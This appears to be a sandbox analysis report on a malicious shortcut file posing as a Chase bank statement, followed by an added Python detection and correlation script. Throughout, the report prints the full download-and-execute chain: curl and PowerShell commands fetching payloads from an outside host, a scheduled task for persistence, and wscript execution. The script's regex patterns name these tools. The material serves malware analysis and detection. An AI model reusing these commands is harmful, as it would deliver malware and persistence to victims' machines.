Windows Analysis Report
chasebank_statement_mar.lnk

Overview

General Information

Sample name:chasebank_statement_mar.lnk
Analysis ID:1417179
MD5:2ac1bf6ce61112134a087ce30d48cd6b
SHA1:3b78b7507e4a1fe63ce51a5a2b19de8487b199f1
SHA256:b54eb35a701e5bba8f1df00f4e21e2bd4637ce3ce490560d203feab0dc84ff06

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Windows shortcut file (LNK) starts blacklisted processes
Found URL in windows shortcut file (LNK)
Machine Learning detection for sample
Sigma detected: Curl Download And Execute Combination
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 6220 cmdline: "C:\Windows\System32\cmd.exe" /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • curl.exe (PID: 6024 cmdline: curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • schtasks.exe (PID: 2232 cmdline: schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1 MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cmd.exe (PID: 1268 cmdline: C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5668 cmdline: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6004 cmdline: "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • wscript.exe (PID: 4480 cmdline: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cmd.exe (PID: 1776 cmdline: C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2952 cmdline: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 1400 cmdline: "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • wscript.exe (PID: 5176 cmdline: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cmd.exe (PID: 5384 cmdline: C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7084 cmdline: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4852 cmdline: "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • wscript.exe (PID: 2876 cmdline: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started; Author: Sreeman, Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1, CommandLine: "C:\Windows\System32\cmd.exe" /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1, ProcessId: 6220, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f, CommandLine: "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f, CommandLine|base64offset|contains: z, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5668, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f, ProcessId: 6004, ProcessName: schtasks.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js, CommandLine: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5668, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js, ProcessId: 4480, ProcessName: wscript.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", CommandLine: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1268, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", ProcessId: 5668, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", CommandLine: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1268, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", ProcessId: 5668, ProcessName: powershell.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js, CommandLine: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5668, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js, ProcessId: 4480, ProcessName: wscript.exe
Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5668, TargetFilename: C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", CommandLine: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1268, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", ProcessId: 5668, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1, CommandLine: schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6220, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1, ProcessId: 2232, ProcessName: schtasks.exe
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: "C:\Windows\System32\cmd.exe" /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1, CommandLine: "C:\Windows\System32\cmd.exe" /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1, ProcessId: 6220, ProcessName: cmd.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js, CommandLine: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5668, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js, ProcessId: 4480, ProcessName: wscript.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", CommandLine: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1268, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", ProcessId: 5668, ProcessName: powershell.exe
No Snort rule has matched
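The process tree and the Sigma matches above describe one chain: the LNK runs cmd.exe, which downloads a .bat with curl and registers a per-minute scheduled task for it; the task then runs the .bat, whose PowerShell downloads a .js to %TEMP%, deletes the task and starts wscript. The two process trees are only linked by the task name, which is why per-event rules alone do not show the whole picture. The following is an added example, not Joe Sandbox or Sigma code: the per-event rules are loosely modelled on the Sigma rule titles listed in the report, the events are constructed from the report's own command lines (with two made-up benign events), and the PID 1268 parent is set to 0 because the Task Scheduler service is not in the sample. Real telemetry should key on process GUIDs rather than PIDs, which Windows reuses (the report itself shows conhost.exe PID 4320 twice).

```python
"""Process-creation triage for the LNK -> curl -> schtasks -> PowerShell -> wscript
chain in this report.  Added example (not Joe Sandbox or Sigma code); rules are
loosely modelled on the Sigma titles the report lists, and the events below are
constructed from the report's process tree."""
import re
from collections import defaultdict

URL_RE = re.compile(r"https?://\S+", re.I)
CURL_OUT = re.compile(r"\s(-o|--output)\s")
# something launched after curl in the same command line ("curl ... & schtasks ...")
CHAINED_EXEC = re.compile(r"&\s*(schtasks|start|cmd|powershell|wscript|cscript|rundll32|regsvr32|mshta)\b")
TEMP_LIKE = re.compile(r"%(tmp|temp|appdata|localappdata)%|\\appdata\\local\\temp\\|\\users\\public\\", re.I)
PS_DOWNLOAD = re.compile(r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadfile|downloadstring|start-bitstransfer)\b", re.I)
PS_OUTFILE = re.compile(r"-outf(ile)?\b", re.I)
SCRIPT_EXT = re.compile(r"\.(js|jse|vbs|vbe|wsf)\b")

# rule name -> kill-chain stage it evidences
STAGE = {
    "curl_download_and_execute": "download", "curl_file_download": "download",
    "powershell_web_download": "download", "powershell_drops_to_temp": "drop",
    "schtasks_create_from_temp": "persistence", "schtasks_delete": "cleanup",
    "script_from_temp": "execution",
}

# Constructed events transcribed from the report; PID 1268's parent (Task Scheduler) is outside the sample.
EVENTS = [
    {"pid": 6220, "ppid": 1028, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'''"C:\Windows\System32\cmd.exe" /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1'''},
    {"pid": 6024, "ppid": 6220, "image": r"C:\Windows\System32\curl.exe",
     "cmd": r'''curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php"'''},
    {"pid": 2232, "ppid": 6220, "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'''schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1'''},
    {"pid": 1268, "ppid": 0, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'''C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2'''},
    {"pid": 5668, "ppid": 1268, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'''powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"'''},
    {"pid": 6004, "ppid": 5668, "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'''"C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f'''},
    {"pid": 4480, "ppid": 5668, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'''"C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'''},
    # two made-up benign events that must stay quiet
    {"pid": 7000, "ppid": 1028, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'''powershell -NoProfile -Command "Get-Process | Sort-Object CPU"'''},
    {"pid": 7001, "ppid": 1028, "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'''schtasks /create /tn NightlyBackup /tr "C:\Program Files\Backup\run.exe" /sc daily'''},
]


def match_rules(ev):
    """Per-event rules; returns the names of the rules that fire, in a fixed order."""
    image = ev["image"].lower().rsplit("\\", 1)[-1]
    cmd = ev["cmd"]
    low = cmd.lower()
    hits = []
    if "curl" in low and CURL_OUT.search(cmd) and CHAINED_EXEC.search(low):
        hits.append("curl_download_and_execute")
    if image == "curl.exe" and CURL_OUT.search(cmd) and URL_RE.search(cmd):
        hits.append("curl_file_download")
    if image == "schtasks.exe" and "/create" in low and TEMP_LIKE.search(cmd):
        hits.append("schtasks_create_from_temp")
    if image == "schtasks.exe" and "/delete" in low:
        hits.append("schtasks_delete")
    if image in ("powershell.exe", "pwsh.exe") and PS_DOWNLOAD.search(cmd):
        hits.append("powershell_web_download")
        if PS_OUTFILE.search(cmd) and TEMP_LIKE.search(cmd):
            hits.append("powershell_drops_to_temp")
    if image in ("wscript.exe", "cscript.exe") and SCRIPT_EXT.search(low) and TEMP_LIKE.search(cmd):
        hits.append("script_from_temp")
    return hits


def find_task_names(events):
    """Task names registered by any 'schtasks /create' in the telemetry."""
    names = set()
    for ev in events:
        if "/create" in ev["cmd"].lower():
            m = re.search(r"/tn\s+\"?([^\s\"]+)", ev["cmd"], re.I)
            if m:
                names.add(m.group(1))
    return names


def descendants(events, roots):
    """Roots plus everything under them in the parent/child tree (keyed by PID; use GUIDs in production)."""
    by_parent = defaultdict(list)
    for ev in events:
        by_parent[ev["ppid"]].append(ev)
    seen, stack = {}, list(roots)
    while stack:
        ev = stack.pop()
        if ev["pid"] not in seen:
            seen[ev["pid"]] = ev
            stack.extend(by_parent[ev["pid"]])
    return seen


def correlate(events):
    """Stitch the separate trees together via the task name; returns {task: [(pid, rule), ...]} in event order."""
    order = {ev["pid"]: i for i, ev in enumerate(events)}
    chains = {}
    for name in find_task_names(events):
        anchored = [ev for ev in events if name in ev["cmd"]]
        members = sorted(descendants(events, anchored).values(), key=lambda e: order[e["pid"]])
        chains[name] = [(ev["pid"], rule) for ev in members for rule in match_rules(ev)]
    return chains


def is_download_execute_chain(hits):
    """True when one task ties together a download, a persistence entry and a script interpreter."""
    return {"download", "persistence", "execution"} <= {STAGE[rule] for _, rule in hits}


if __name__ == "__main__":
    for name, hits in correlate(EVENTS).items():
        print(f"task {name}: {'DOWNLOAD-EXECUTE CHAIN' if is_download_execute_chain(hits) else 'no chain'}")
        for pid, rule in hits:
            print(f"  pid {pid}: {rule} [{STAGE[rule]}]")
```

The point of `correlate` is that neither tree is conclusive alone: tree one is "curl plus a scheduled task", tree two is "PowerShell download plus wscript". Joined on the task name they cover download, persistence and execution, which is what the verdict requires; the benign nightly-backup task produces a chain with no hits.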


AV Detection

Source: http://pesterbdd.com/images/Pester.png; URL Reputation: Label: malware
Source: C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js; Avira: detection malicious, Label: JS/PShelldldr.MGBK
Source: chasebank_statement_mar.lnk; Joe Sandbox ML: detected
Source: unknown; HTTPS traffic detected: 103.26.141.28:443 -> 192.168.2.5:49706 version: TLS 1.2
